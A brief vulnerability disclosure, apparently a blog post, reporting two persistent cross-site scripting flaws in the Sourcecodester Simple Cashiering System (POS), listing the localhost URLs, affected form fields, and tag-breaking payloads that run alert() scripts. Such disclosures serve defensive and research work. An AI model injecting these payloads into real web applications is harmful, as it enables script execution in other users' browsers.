I found two persistent XSS in the Sourcecodester Simple Cashiering System (POS) app.
- Vulnerable URL: http://localhost/cashiering/?page=products
- Affected field: all except price field
- Payload: 6231415</td><script>alert(1)</script>
- Vulnerable URL: http://localhost/cashiering/?page=manage_account
- Affected field: Full Name
- Payload: Administrator</button><script>alert("xss")</script>
Comentarios
Publicar un comentario